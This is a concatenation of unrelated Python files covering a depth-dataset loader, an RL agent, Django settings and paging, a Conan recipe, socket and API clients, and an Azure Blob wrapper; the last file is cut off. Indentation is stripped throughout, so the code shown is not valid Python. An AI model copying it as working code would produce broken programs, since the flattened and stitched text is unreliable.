def download(self, path, split):
root = path
out_folder = root
train_images_folder = os.path.join(path, 'train', 'images')
train_annotations_folder = os.path.join(path, 'train', 'annotations')
val_images_folder = os.path.join(path, 'val', 'images')
val_annotations_folder = os.path.join(path, 'val', 'annotations')
if (not self.force_download) and os.path.exists(path) and os.path.exists(train_images_folder) and \
os.path.exists(train_annotations_folder) and os.path.exists(val_images_folder) and \
os.path.exists(val_annotations_folder):
print(utils.log_color('\nINFO', 'dataset exists - will reuse', path))
return
#
print(utils.log_color('\nINFO', 'downloading and preparing dataset', path + ' This may take some time.'))
print(f'{Fore.YELLOW}'
f'\nNYUDepthV2 Dataset:'
f'\n Indoor Segmentation and Support Inference from RGBD Images'
f'\n Silberman, N., Hoiem, D., Kohli, P., & Fergus, R. , European Conference on Computer Vision (ECCV), 2012. '
f'\n Visit the following urls to know more about NYUDepthV2 dataset: '
f'\n https://www.tensorflow.org/datasets/catalog/nyu_depth_v2'
f'\n https://cs.nyu.edu/~silberman/datasets/nyu_depth_v2.html '
f'{Fore.RESET}\n')
dataset_url = 'http://horatio.cs.nyu.edu/mit/silberman/nyu_depth_v2/nyu_depth_v2_labeled.mat'
split_url = 'https://github.com/cleinc/bts/blob/master/utils/splits.mat?raw=true'
root = root.rstrip('/')
download_root = os.path.join(root, 'download')
file_path = utils.download_file(dataset_url, root=download_root, force_download=self.force_download)
split_path = utils.download_file(split_url, root=download_root, force_download=self.force_download)
h5_file = h5py.File(file_path, 'r')
split = scipy.io.loadmat(split_path)
os.makedirs(out_folder, exist_ok=True)
os.makedirs(train_images_folder, exist_ok=True)
os.makedirs(train_annotations_folder, exist_ok=True)
os.makedirs(val_images_folder, exist_ok=True)
os.makedirs(val_annotations_folder, exist_ok=True)
test_images = set([int(x) for x in split["testNdxs"]])
train_images = set([int(x) for x in split["trainNdxs"]])
depths_raw = h5_file['rawDepths']
images = h5_file['images']
scenes = [u''.join(chr(c) for c in h5_file[obj_ref]) for obj_ref in h5_file['sceneTypes'][0]]
for i, (image, scene, depth_raw) in enumerate(zip(images, scenes, depths_raw)):
depth_raw = depth_raw.T
image = image.T
idx = int(i) + 1
if idx in train_images:
train_val = "train"
else:
assert idx in test_images, "index %d neither found in training set nor in test set" % idx
train_val = "val"
#folder = "%s/%s" % (out_folder, train_val)
folder = os.path.join(out_folder, train_val)
images_folder = os.path.join(folder, 'images')
annotations_folder = os.path.join(folder, 'annotations')
# if not os.path.exists(folder):
# os.makedirs(folder)
depth_raw = depth_raw.clip(0.0, 255.0 )
img_depth = depth_raw * self.depth_label_scale
img_depth_uint16 = img_depth.astype(np.uint16)
cv2.imwrite("%s/%05d.png" % (annotations_folder, i), img_depth_uint16)
image = image[:, :, ::-1]
image_black_boundary = np.zeros((480, 640, 3), dtype=np.uint8)
image_black_boundary[7:474, 7:632, :] = image[7:474, 7:632, :]
cv2.imwrite("%s/%05d.jpg" % (images_folder, i), image_black_boundary)
#
print(utils.log_color('\nINFO', 'dataset ready', path))
return
def __len__(self):
return self.num_frames
def __getitem__(self, idx, with_label=False):
if with_label:
image_file = self.imgs[idx]
label_file = self.labels[idx]
return image_file, label_file
else:
return self.imgs[idx]
#
def __call__(self, predictions, **kwargs):
return self.evaluate(predictions, **kwargs)
def compute_scale_and_shift(self, prediction, gt, mask):
a_00 = np.sum(mask * prediction * prediction)
a_01 = np.sum(mask * prediction)
a_11 = np.sum(mask)
b_0 = np.sum(mask * prediction * gt)
b_1 = np.sum(mask * gt)
det = a_00 * a_11 - a_01 * a_01
if det <= 0:
return 0, 0
else:
x_0 = (a_11 * b_0 - a_01 * b_1) / det
x_1 = (-a_01 * b_0 + a_00 * b_1) / det
return x_0, x_1
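    # Note (descriptive sketch of the method above): compute_scale_and_shift solves the
    # masked least-squares problem
    #   argmin_{s, t}  sum( mask * (s * prediction + t - gt)^2 )
    # via the 2x2 normal equations
    #   [[a_00, a_01], [a_01, a_11]] @ [s, t] = [b_0, b_1]
    # and returns (0, 0) when the system is singular (det <= 0), i.e. when no
    # scale/shift alignment can be recovered from the masked pixels.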
def evaluate(self, predictions, threshold=1.25, depth_cap_max = 80, depth_cap_min = 1e-3, **kwargs):
disparity = kwargs.get('disparity')
scale_and_shift_needed = kwargs.get('scale_shift')
delta_1 = 0.0
num_frames = min(self.num_frames, len(predictions))
for n in range(num_frames):
image_file, label_file = self.__getitem__(n, with_label=True)
label_img = PIL.Image.open(label_file)
label_img = np.array(label_img, dtype=np.float32) / self.depth_label_scale
prediction = predictions[n]
if scale_and_shift_needed:
mask = label_img != 0
disp_label = np.zeros_like(label_img)
disp_label[mask] = 1.0 / label_img[mask]
if not disparity:
disp_prediction = np.zeros_like(prediction)
disp_prediction[prediction != 0] = 1.0 / prediction[prediction != 0]
else:
disp_prediction = prediction
scale, shift = self.compute_scale_and_shift(disp_prediction, disp_label, mask)
prediction = scale * disp_prediction + shift
prediction[prediction < 1 / depth_cap_max] = 1 / depth_cap_max
prediction[prediction > 1 / depth_cap_min] = 1 / depth_cap_min
mask = np.minimum(label_img, prediction) != 0
if disparity:
disp_pred = prediction
prediction = np.zeros_like(disp_pred)
prediction[mask] = 1.0 / disp_pred[mask]
delta = np.zeros_like(label_img, dtype=np.float32)
delta = np.maximum(
prediction[mask] / label_img[mask],
label_img[mask] / prediction[mask]
)
good_pixels_in_img = delta < threshold
delta_1 += good_pixels_in_img.sum() / mask.sum()
#
delta_1 /= (n + 1)
metric = {'accuracy_delta_1%': delta_1 * 100}
return metric |
"""
@author: David Lei
@since: 20/10/2017
Given two sorted lists, return a list of their intersection with no
duplicates using O(1) extra space and O(n) run time.
For example:
A[2,3,3,4,6,6,8] B[3,3,6,7,9]
should return [3, 6]
Approach:
Since they are sorted we can have a pointer i looking at array a and a pointer j looking at array b and iterate through both,
which would be O(a) + O(b) = O(n) where n is the number of items in both arrays.
I'm not sure how to make the output constant space, so I'll make the output O(intersection) but won't use any other space apart from that.
Another approach is to use sets, turn both arrays into a set and return the intersection, but that would use extra space.
"""
def intersection_extra_space(array_a, array_b):
    return sorted(set(array_a) & set(array_b))
def intersection(array_a, array_b):
i = 0
j = 0
    # Doing it without a set means we need to keep track of the last number we added (instead of using output = set()).
last_num = None
output = []
while True:
        # Termination: once we have looked through all of one array, there can't be anything shared past that point.
if i >= len(array_a):
break
if j >= len(array_b):
break
if array_a[i] == array_b[j]:
if last_num != array_a[i]: # Don't already have a copy of this.
output.append(array_a[i])
            last_num = array_a[i]  # Always remember the last matched value so later duplicates are skipped.
# Can increment both as don't want dups.
i += 1
j += 1
elif array_a[i] < array_b[j]:
i += 1
else:
j += 1
return output
if __name__ == "__main__":
a = [2,3,3,4,6,6,8]
b = [3,3,6,7,9]
print(intersection_extra_space(a, b))
print(intersection(a, b)) |
from dataclasses import astuple
import agent
import numpy as np
import torch
import torch.nn as nn
from agent import NNBase
from gym import Space
from gym.spaces import Box, Dict, Discrete, MultiDiscrete
from my.env import Obs
from transformers import CLIPModel
from utils import init
def get_size(space: Space):
if isinstance(space, (Box, MultiDiscrete)):
return int(np.prod(space.shape))
if isinstance(space, Discrete):
return 1
raise TypeError()
class Agent(agent.Agent):
def __init__(self, observation_space, **kwargs):
spaces = Obs(**observation_space.spaces)
super().__init__(
obs_shape=spaces.image.shape, observation_space=observation_space, **kwargs
)
def build_base(self, obs_shape, **kwargs):
return Base(**kwargs)
class ResidualBlock(nn.Module):
def __init__(self, channels: int):
super().__init__()
self.net = nn.Sequential(
nn.ReLU(),
nn.Conv2d(
channels, channels, kernel_size=(3, 3), stride=(1, 1), padding="same"
),
nn.ReLU(),
nn.Conv2d(
channels, channels, kernel_size=(3, 3), stride=(1, 1), padding="same"
),
)
def forward(self, x):
return x + self.net(x)
class Base(NNBase):
def __init__(
self,
clip: bool,
gpt_embeddings: bool,
hidden_size: int,
image_size: int,
observation_space: Dict,
recurrent: bool,
large_architecture: bool,
train_ln: bool,
train_wpe: bool,
):
self.observation_spaces = Obs(**observation_space.spaces)
if gpt_embeddings:
*_, self.mission_size = self.observation_spaces.mission.shape
else:
self.mission_size = 2048
super().__init__(
recurrent=recurrent,
recurrent_input_size=image_size + self.mission_size,
hidden_size=hidden_size,
)
self.clip = clip
self.train_wpe = train_wpe
self.train_ln = train_ln
self.embeddings = None if gpt_embeddings else self.build_embeddings()
image_shape = self.observation_spaces.image.shape
d, h, w = image_shape
if clip:
self.clip: CLIPModel = CLIPModel.from_pretrained(
"openai/clip-vit-base-patch32"
)
for name, p in self.clip.vision_model.named_parameters():
requires_grad = (self.train_wpe and "position_embedding" in name) or (
self.train_ln and "layer_norm" in name
)
p.requires_grad_(requires_grad)
else:
def get_image_net():
prev = d
if not large_architecture:
for (num_ch, kernel_size, stride) in [
(16, 8, 4),
(32, 4, 2),
]: # Downscale.
yield nn.Conv2d(
prev, num_ch, kernel_size=kernel_size, stride=stride
)
yield nn.ReLU()
prev = num_ch
else:
for (num_ch, num_blocks) in [
(16, 2),
(32, 2),
(32, 2),
]: # Downscale.
yield nn.Conv2d(prev, num_ch, kernel_size=(3, 3), stride=(1, 1))
yield nn.MaxPool2d(
kernel_size=(3, 3),
stride=[2, 2],
)
# Residual block(s).
for _ in range(num_blocks):
yield ResidualBlock(num_ch)
prev = num_ch
yield nn.ReLU()
yield nn.Flatten()
self._image_net = nn.Sequential(*get_image_net())
dummy_input = torch.zeros(1, d, h, w)
output = self.image_net(dummy_input)
self.image_linear = nn.Sequential(
nn.Linear(output.size(-1), image_size), nn.ReLU()
)
self._hidden_size = hidden_size
self._recurrent = recurrent
self.initial_hxs = nn.Parameter(self._initial_hxs)
init_ = lambda m: init(
m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0)
)
self.critic_linear = init_(nn.Linear(hidden_size, 1))
def image_net(self, image: torch.Tensor):
if self.clip:
state = self.clip.vision_model(pixel_values=image).last_hidden_state
return state.mean(1)
return self._image_net(image)
def build_embeddings(self):
num_embeddings = self.observation_spaces.mission.high.max()
return nn.EmbeddingBag(int(num_embeddings) + 1, self.mission_size)
def embed(self, inputs):
if self.embeddings is not None:
return self.embeddings.forward(inputs.long())
return inputs
def forward(self, inputs, rnn_hxs, masks):
inputs = Obs(
*torch.split(
inputs,
[get_size(space) for space in astuple(self.observation_spaces)],
dim=-1,
)
)
image = inputs.image.reshape(-1, *self.observation_spaces.image.shape)
image = self.image_net(image)
image = self.image_linear(image)
mission = inputs.mission.reshape(-1, *self.observation_spaces.mission.shape)
n, l, e = mission.shape
flattened = mission.reshape(n * l, e)
states = self.embed(flattened)
states = states.reshape(n, l, -1)
mission = states.mean(1)
x = torch.cat([image, mission], dim=-1)
assert self.is_recurrent
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
|
import argparse
import os
import sys
import zipfile
def parse_args(args_list):
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='install cudnn')
parser.add_argument('zipfile', help='downloaded cudnn zip file')
args = parser.parse_args(args_list)
return args
def main(args_list):
args = parse_args(args_list)
print('Installing cudnn...')
with zipfile.ZipFile(args.zipfile, 'r') as zf:
zf.extractall('cudnn')
print('Done.')
if __name__ == '__main__':
main(sys.argv[1:])
|
"""Configuring Django Mutadi app for Heroku"""
import os
import django_heroku
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from .base import *
SECRET_KEY = os.environ["DJANGO_SECRET_KEY"]
DEBUG = False
ALLOWED_HOSTS = [os.environ["DJANGO_ALLOWED_HOSTS"]]
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
SECURE_HSTS_SECONDS = 15768000
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_PRELOAD = True
SECURE_BROWSER_XSS_FILTER = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
SECURE_SSL_REDIRECT = True
sentry_sdk.init(
dsn=os.environ["SENTRY_DSN"],
integrations=[DjangoIntegration()],
traces_sample_rate=1.0,
# If you wish to associate users to errors (assuming you are using
# django.contrib.auth) you may enable sending PII data.
send_default_pii=True,
)
# Activate Django-Heroku.
django_heroku.settings(locals())
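# Deployment note (sketch): this settings module expects the following environment
# variables to be present on the Heroku app (configurable e.g. with `heroku config:set`):
#   DJANGO_SECRET_KEY, DJANGO_ALLOWED_HOSTS, SENTRY_DSN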
|
import os
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
required_conan_version = ">=1.33.0"
class LibBasisUniversalConan(ConanFile):
name = "libbasisu"
description = "Basis Universal Supercompressed GPU Texture Codec"
homepage = "https://github.com/BinomialLLC/basis_universal"
topics = ("conan", "basis", "textures", "compression")
url = "https://github.com/conan-io/conan-center-index"
license = "Apache-2.0"
exports_sources = ["CMakeLists.txt", "patches/*"]
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
options = {
"fPIC": [True, False],
"shared": [True, False],
"use_sse4": [True, False],
"with_zstd": [True, False],
"enable_encoder": [True, False],
"custom_iterator_debug_level": [True, False]
}
default_options = {
"fPIC": True,
"shared": False,
"use_sse4": False,
"with_zstd": True,
"enable_encoder": True,
"custom_iterator_debug_level": False
}
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def _use_custom_iterator_debug_level(self):
return self.options.get_safe("custom_iterator_debug_level", default=self.default_options["custom_iterator_debug_level"])
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
if self.settings.compiler != "Visual Studio":
del self.options.custom_iterator_debug_level
    def _minimum_compiler_version(self) -> dict:
return {
"Visual Studio": "15",
"gcc": "5.4",
"clang": "3.9",
"apple-clang": "10"
}
def validate(self):
min_version = self._minimum_compiler_version().get(str(self.settings.compiler))
if not min_version:
self.output.warn("{} recipe lacks information about the {} compiler support.".format(
self.name, self.settings.compiler))
elif tools.Version(self.settings.compiler.version) < min_version:
            raise ConanInvalidConfiguration("{} {} does not support {} {}; the minimum supported compiler version is {}".format(self.name, self.version, self.settings.compiler, self.settings.compiler.version, min_version))
if self.settings.compiler.get_safe("cppstd"):
tools.check_min_cppstd(self, 11)
def configure(self):
if self.options.shared:
del self.options.fPIC
def source(self):
tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions["SSE4"] = self.options.use_sse4
self._cmake.definitions["ZSTD"] = self.options.with_zstd
self._cmake.definitions["ENABLE_ENCODER"] = self.options.enable_encoder
self._cmake.definitions["NO_ITERATOR_DEBUG_LEVEL"] = not self._use_custom_iterator_debug_level()
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
self.copy("*.h", dst=os.path.join("include", self.name, "transcoder"), src=os.path.join(self._source_subfolder, "transcoder"))
if self.options.enable_encoder:
self.copy("*.h", dst=os.path.join("include", self.name, "encoder"), src=os.path.join(self._source_subfolder, "encoder"))
self.copy(pattern="*.a", dst="lib", keep_path=False)
self.copy(pattern="*.so", dst="lib", keep_path=False)
self.copy(pattern="*.dylib*", dst="lib", keep_path=False)
self.copy(pattern="*.lib", dst="lib", keep_path=False)
self.copy(pattern="*.dll", dst="bin", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.names["cmake_find_package"] = self.name
self.cpp_info.names["cmake_find_package_multi"] = self.name
self.cpp_info.includedirs = ["include", os.path.join("include", self.name)]
if self.settings.os == "Linux":
self.cpp_info.system_libs = ["m", "pthread"]
self.cpp_info.defines.append("BASISU_NO_ITERATOR_DEBUG_LEVEL={}".format("1" if self._use_custom_iterator_debug_level() else "0"))
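# Usage note (sketch): with Conan 1.x, consumers of this recipe can toggle the options
# declared above from the command line, e.g.
#   conan install . -o libbasisu:use_sse4=True -o libbasisu:shared=True
# (hypothetical invocation; option names are the ones in the `options` dict).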
|
from core import MLPActorCritic
import numpy as np
import torch
from torch.distributions import Normal
import torch.nn as nn
from torch.nn.modules import activation
from torch.nn import MSELoss
from torch.optim import Adam
import gym
import math
from skimage.transform import resize
from copy import deepcopy
# BipedalWalker-v3
pi_lr = 1e-3
qf_lr = 1e-3
# LunarLanderContinuous-v2
env = gym.make('BipedalWalker-v3').unwrapped
action_dim = env.action_space.shape[0]
state_dim = env.observation_space.shape[0]
act_limit = env.action_space.high[0]
episode_steps_num = 4000
episode_iters_num = 1000
max_steps_per_game = 500
train_iters_num = 50
clip_ratio = 0.2
height = 100
width = 100
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
device = 'cpu'
target_kl = 0.01
print('working on', device)
gamma = 0.99
polyak = 0.99
update_after = 1000
print(act_limit)
print(state_dim)
print(action_dim)
class Buffer:
def __init__(self, state_dim, action_dim, capactiy):
self.states = np.zeros((capactiy, state_dim))
self.next_states = np.zeros((capactiy, state_dim))
self.actions = np.zeros((capactiy, action_dim))
self.rewards = np.zeros(capactiy)
self.dones = np.zeros(capactiy)
self.capactiy = capactiy
self.current_index = 0
self.current_size = 0
def store(self, state, next_state, action, reward, done):
self.states[self.current_index] = state
self.next_states[self.current_index] = next_state
self.actions[self.current_index] = action
self.rewards[self.current_index] = reward
self.dones[self.current_index] = done
self.current_index = (self.current_index + 1) % self.capactiy
self.current_size = min(self.current_size + 1, self.capactiy)
def __len__(self):
        return self.current_size
def batch(self, batch_size=128):
assert batch_size <= self.current_size
indexs = np.random.randint(0, self.current_size, size=batch_size)
batch = {'states': self.states[indexs],
'next_states': self.next_states[indexs],
'actions': self.actions[indexs],
'rewards': self.rewards[indexs],
'dones': self.dones[indexs]}
return batch
class Mlp(nn.Module):
def __init__(self, state_dim, action_dim, mid_n, out_activation=nn.Identity) -> None:
super().__init__()
self.net = nn.Sequential(nn.Linear(state_dim, mid_n), nn.ReLU(),
nn.Linear(mid_n, mid_n), nn.ReLU(),
nn.Linear(mid_n, mid_n), nn.ReLU(),
nn.Linear(mid_n, action_dim), out_activation())
def forward(self, x):
return self.net(x)
class Agent:
def __init__(self, state_dim, action_dim) -> None:
self.pi = Mlp(state_dim, action_dim, 64, nn.Tanh)
self.qf = Mlp(state_dim + action_dim, 1, 64)
self.pi_target = deepcopy(self.pi)
self.qf_target = deepcopy(self.qf)
# for p in self.pi_target.parameters():
# p.requires_grad = False
# for p in self.qf_target.parameters():
# p.requires_grad = False
self.pi_optim = Adam(self.pi.parameters(), lr=pi_lr)
self.qf_optim = Adam(self.qf.parameters(), lr=qf_lr)
# # Create actor-critic module and target networks
# self.ac = MLPActorCritic(env.observation_space, env.action_space)
# self.ac_targ = deepcopy(self.ac)
# # Freeze target networks with respect to optimizers (only update via polyak averaging)
# for p in self.ac_targ.parameters():
# p.requires_grad = False
# self.pi_optim = Adam(self.ac.pi.parameters(), lr=pi_lr)
# self.qf_optim = Adam(self.ac.q.parameters(), lr=qf_lr)
def step(self, state, noise_scale):
with torch.no_grad():
state = torch.FloatTensor(state)
action = act_limit * self.pi(state).numpy()
action += noise_scale * np.random.randn(action_dim)
# action = self.ac.act(torch.as_tensor(state, dtype=torch.float32))
# action += noise_scale * np.random.randn(action_dim)
return np.clip(action, -act_limit, act_limit)
def learn(self, batch):
states = torch.FloatTensor(batch['states'])
next_states = torch.FloatTensor(batch['next_states'])
actions = torch.FloatTensor(batch['actions'])
rewards = torch.FloatTensor(batch['rewards'])
dones = torch.BoolTensor(batch['dones'])
q_value = self.qf(torch.cat([states, actions], dim=-1))
with torch.no_grad():
q_next_value = self.qf_target(torch.cat([next_states, self.pi_target(next_states)], dim=-1))
q_next_value[dones] = 0
q_target_value = rewards.unsqueeze(-1) + gamma * q_next_value
qf_loss = MSELoss()(q_target_value, q_value)
self.qf_optim.zero_grad()
qf_loss.backward()
self.qf_optim.step()
# frezee qf param
for param in self.qf.parameters():
param.requires_grad = False
pi_loss = -self.qf(torch.cat([next_states, self.pi(next_states)], dim=-1)).mean()
self.pi_optim.zero_grad()
pi_loss.backward()
self.pi_optim.step()
for param in self.qf.parameters():
param.requires_grad = True
with torch.no_grad():
for param, param_target in zip(self.qf.parameters(), self.qf_target.parameters()):
param_target.data.mul_(polyak)
param_target.data.add_((1 - polyak) * param.data)
for param, param_target in zip(self.pi.parameters(), self.pi_target.parameters()):
param_target.data.mul_(polyak)
param_target.data.add_((1 - polyak) * param.data)
# self.qf_target.load_state_dict(self.qf.state_dict())
# self.pi_target.load_state_dict(self.pi.state_dict())
return pi_loss.item(), qf_loss.item()
agent = Agent(state_dim, action_dim)
buffer = Buffer(state_dim, action_dim, int(1e6))
pi_loss_list = []
qf_loss_list = []
return_list = []
for episode_i in range(episode_iters_num):
state = env.reset()
total_reward = 0
step_index = 0
for step_i in range(episode_steps_num):
action = agent.step(state, 0.3)
next_state, reward, done, _ = env.step(action)
if(step_index == max_steps_per_game - 1):
done = True
# reward = -100
buffer.store(state, next_state, action, reward, done)
state = next_state
total_reward += reward
step_index += 1
if done:
state = env.reset()
return_list.append(total_reward)
total_reward = 0
step_index = 0
if step_i >= update_after and step_i % train_iters_num == 0:
for i in range(train_iters_num):
pi_loss, qf_loss = agent.learn(buffer.batch())
pi_loss_list.append(pi_loss)
qf_loss_list.append(qf_loss)
if(episode_i % 40 == 0 and episode_i != 0):
state = env.reset()
total_reward = 0
for step_i in range(max_steps_per_game):
action = agent.step(state, 0)
state, reward, done, _ = env.step(action)
env.render()
if(step_index == max_steps_per_game - 1):
done = True
total_reward += reward
if done:
print('test | return: {}'.format(total_reward))
break
if(episode_i % 1 == 0):
print('episode {}| pi_loss {} qf_loss {} return {}'.format(
episode_i,
format(np.mean(pi_loss_list), '.3f'),
format(np.mean(qf_loss_list), '.3f'),
format(np.mean(return_list), '.2f')))
pi_loss_list = []
qf_loss_list = []
return_list = []
|
from django.conf import settings
from . import models
def init_paging_details(page_number):
page_size = settings.PAGE_SIZE
start = (page_number - 1) * page_size
return models.PagingDetails(
page_number=page_number,
start_record=start,
end_record=start + page_size,
prev_page="",
next_page="",
)
def set_paging_links(paging, url):
number_of_items = paging.end_record - paging.start_record
if number_of_items >= settings.PAGE_SIZE:
paging.next_page = url + "?pageNo=" + str(paging.page_number + 1)
    if paging.page_number > 1:
paging.prev_page = url + "?pageNo=" + str(paging.page_number -1)
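# Minimal usage sketch (hypothetical view code; the url and page number are assumptions):
#   paging = init_paging_details(page_number=2)
#   ...run the query, then set paging.end_record to start_record + rows actually returned...
#   set_paging_links(paging, "/articles")  # fills next_page/prev_page with "?pageNo=..." links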
|
"""
Use of this source code is governed by the MIT license found in the LICENSE file.
Socket connection
"""
import time
import threading
import logging
from queue import Queue
import socket
from plugwise.constants import SLEEP_TIME
from plugwise.connections.connection import StickConnection
from plugwise.message import PlugwiseMessage
from plugwise.util import PlugwiseException
class SocketConnection(StickConnection):
"""
Wrapper for Socket connection configuration
"""
def __init__(self, device, stick=None):
StickConnection.__init__(self)
self.logger = logging.getLogger("plugwise")
self._device = device
self.stick = stick
# get the address from a <host>:<port> format
addr = device.split(":")
addr = (addr[0], int(addr[1]))
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect(addr)
except Exception:
self.logger.error(
"Could not open socket, \
no messages are read or written to the bus"
)
            raise PlugwiseException("Could not open socket port")
# build a read thread
self._listen_process = threading.Thread(
None, self.read_daemon, "plugwise-process-reader", (), {}
)
self._listen_process.daemon = True
self._listen_process.start()
# build a writer thread
self._write_queue = Queue()
self._write_process = threading.Thread(
None, self.write_daemon, "plugwise-connection-writer", (), {}
)
self._write_process.daemon = True
self._write_process.start()
def stop_connection(self):
"""Close the socket."""
self.logger.warning("Stop executed")
try:
self._socket.close()
except Exception:
self.logger.error("Error while closing socket")
            raise PlugwiseException("Error while closing socket")
time.sleep(1)
def feed_parser(self, data):
"""Parse received message."""
assert isinstance(data, bytes)
self.stick.feed_parser(data)
def send(self, message, callback=None):
"""Add message to write queue."""
assert isinstance(message, PlugwiseMessage)
self._write_queue.put_nowait((message, callback))
def read_daemon(self):
"""Read thread."""
while True:
data = self._socket.recv(9999)
self.feed_parser(data)
def write_daemon(self):
"""Write thread."""
while True:
(message, callback) = self._write_queue.get(block=True)
self.logger.info("Sending message on USB bus: %s", str(message))
self.logger.error("Sending binary message: %s", str(message.serialize()))
self._socket.send(message.serialize())
time.sleep(SLEEP_TIME)
if callback:
callback()
|
import requests
url = "https://giftcards.reloadly.com/reports/transactions?startDate=2021-06-01 00:00:00&endDate=2021-06-18 23:17:02"
payload={}
headers = {
'Authorization': 'Bearer eyJraXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
'Content-Type': 'application/json',
'Accept': 'application/com.reloadly.giftcards-v1+json'
}
response = requests.request("GET", url, headers=headers, data=payload)
print(response.text) |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""Uses the Azure Python SDK to interact with Azure Blob Storage."""
import datetime
from typing import Any, List, Optional
import pandas as pd
from azure.common.exceptions import CloudError
from azure.core.exceptions import (
ResourceExistsError,
ResourceNotFoundError,
ServiceRequestError,
)
from azure.storage.blob import BlobServiceClient, generate_blob_sas
from ...common.azure_auth import az_connect
from ...common.azure_auth_core import AzCredentials, AzureCloudConfig
class AzureBlobStorage:
"""Class for interacting with Azure Blob Storage."""
def __init__(
self,
abs_name: str = None,
connect: bool = False,
abs_connection_string: str = None,
):
"""Initialize connector for Azure Python SDK."""
self.connected = False
self.abs_site = f"{abs_name}.blob.core.windows.net"
self.connection_string = abs_connection_string
self.credentials: Optional[AzCredentials] = None
self.abs_client: Optional[BlobServiceClient] = None
if connect:
self.connect()
def connect(
self,
auth_methods: List = None,
silent: bool = False,
):
"""Authenticate with the SDK."""
self.credentials = az_connect(auth_methods=auth_methods, silent=silent)
if not self.credentials:
raise CloudError("Could not obtain credentials.")
if not self.connection_string:
self.abs_client = BlobServiceClient(self.abs_site, self.credentials.modern)
else:
self.abs_client = BlobServiceClient.from_connection_string(
self.connection_string
)
if not self.abs_client:
raise CloudError("Could not create a Blob Storage client.")
self.connected = True
def containers(self) -> pd.DataFrame:
"""Return containers in the Azure Blob Storage Account."""
try:
container_list = self.abs_client.list_containers() # type:ignore
except ServiceRequestError as err:
raise CloudError(
"Unable to connect check the Azure Blob Store account name"
) from err
return (
_parse_returned_items( # type:ignore
container_list, remove_list=["lease", "encryption_scope"]
)
if container_list
else None
)
def create_container(self, container_name: str, **kwargs) -> pd.DataFrame:
"""
Create a new container within the Azure Blob Storage account.
Parameters
----------
container_name : str
The name for the new container.
Additional container parameters can be passed as kwargs
Returns
-------
pd.DataFrame
Details of the created container.
"""
try:
new_container = self.abs_client.create_container( # type: ignore
container_name, **kwargs
) # type:ignore
except ResourceExistsError as err:
raise CloudError(f"Container {container_name} already exists.") from err
properties = new_container.get_container_properties()
return _parse_returned_items([properties], ["encryption_scope", "lease"])
def blobs(self, container_name: str) -> Optional[pd.DataFrame]:
"""
Get a list of blobs in a container.
Parameters
----------
container_name : str
The name of the container to get blobs from.
Returns
-------
pd.DataFrame
Details of the blobs.
"""
container_client = self.abs_client.get_container_client(container_name) # type: ignore
blobs = list(container_client.list_blobs())
return _parse_returned_items(blobs) if blobs else None
def upload_to_blob(
self, blob: Any, container_name: str, blob_name: str, overwrite: bool = True
):
"""
Upload a blob of data.
Parameters
----------
blob : Any
The data to upload.
container_name : str
The name of the container to upload the blob to.
blob_name : str
The name to give the blob.
overwrite : bool, optional
Whether or not you want to overwrite the blob if it exists, by default True.
"""
try:
blob_client = self.abs_client.get_blob_client( # type:ignore
container=container_name, blob=blob_name
)
upload = blob_client.upload_blob(blob, overwrite=overwrite)
except ResourceNotFoundError as err:
raise CloudError(
"Unknown container, check container name or create it first."
) from err
if not upload["error_code"]:
print("Upload complete")
else:
raise CloudError(
f"There was a problem uploading the blob: {upload['error_code']}"
)
return True
def get_blob(self, container_name: str, blob_name: str) -> bytes:
"""
Get a blob from the Azure Blob Storage account.
Parameters
----------
container_name : str
The name of the container that holds the blob.
blob_name : str
The name of the blob to download.
Returns
-------
bytes
The content of the blob in bytes.
"""
blob_client = self.abs_client.get_blob_client( # type: ignore
container=container_name, blob=blob_name
)
if not blob_client.exists():
raise CloudError(f"The blob {blob_name} does not exist in {container_name}")
data_stream = blob_client.download_blob()
return data_stream.content_as_bytes()
def delete_blob(self, container_name: str, blob_name: str) -> bool:
"""
Delete a blob from the Azure Blob Storage account.
Parameters
----------
container_name : str
The container name that has the blob.
blob_name : str
The name of the blob to delete.
Note deleting a blob also deletes associated snapshots.
Returns
-------
bool
True if blob successfully deleted
"""
blob_client = self.abs_client.get_blob_client( # type: ignore
container=container_name, blob=blob_name
)
if blob_client.exists():
blob_client.delete_blob(delete_snapshots="include")
else:
raise CloudError(f"The blob {blob_name} does not exist in {container_name}")
return True
def get_sas_token(
self,
container_name: str,
blob_name: str,
end: datetime.datetime = None,
permission: str = "r",
) -> str:
"""
Generate a shared access string (SAS) token for a blob.
Parameters
----------
container_name : str
The name of the Azure Blob Storage container that holds the blob.
blob_name : str
The name of the blob to generate the SAS token for.
end : datetime.datetime, optional
The datetime the SAS token should expire, by default this is 7 days from now.
permission : str, optional
The permissions to give the SAS token, by default 'r' for read.
Returns
-------
str
A URI of the blob with SAS token.
"""
start = datetime.datetime.now()
if not end:
end = start + datetime.timedelta(days=7)
key = self.abs_client.get_user_delegation_key(start, end) # type: ignore
abs_name = self.abs_client.account_name # type: ignore
sast = generate_blob_sas(
abs_name,
container_name,
blob_name,
